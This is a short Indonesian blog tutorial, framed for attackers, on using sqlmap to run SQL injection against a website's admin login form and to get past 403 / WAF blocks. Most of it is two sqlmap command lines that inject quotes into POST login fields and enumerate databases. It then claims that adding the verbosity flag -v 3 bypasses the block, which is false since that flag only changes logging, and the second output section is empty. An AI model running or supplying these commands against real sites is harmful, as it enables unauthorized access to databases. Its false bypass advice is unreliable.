Tutorial SQLMap Bypass Error 403

Tutorial SQLMap Bypass Error 403

Terinspirasi dari masalah yang dialami oleh seseorang teman saya ketika melakukan sql injection terkendala oleh 403 (Not Acceptable) dimana dalam SQL Injection terkadang ada beberapa query atau sintak yang dibatasi penggunaanya atau jusru adanya waf yang sangad kerad. Hal ini tentu saja menyusahkan para attacker dalam melakukan aksinya karna 403 (Not Acceptable) menyebabkan gagalnya proses sql injection. Pada kali ini saya akan membahas cara bypass sqlmap error 403 (Not Acceptable). Oke langsung saja kita praktek

Basic Command Sqlmap:

sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agent

Output:

[20:44:30] [WARNING] heuristic (basic) test shows that POST parameter ‘username’ might not be injectable

Bypass Command:

 sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agent -v 3

 Output:

Dengan menambahkan verbose kita dapat membypass  Error 403 (Not Acceptable). Untuk kasus lain kalian juga bisa mencoba cara ini. sesuaikan juga --level --risk untuk menambah tingkat keberhasilan saat melakukan SQLinjection.

Semoga bermanfaat.

Jika anda ingin tanya jawab bisa hubungi ke SINI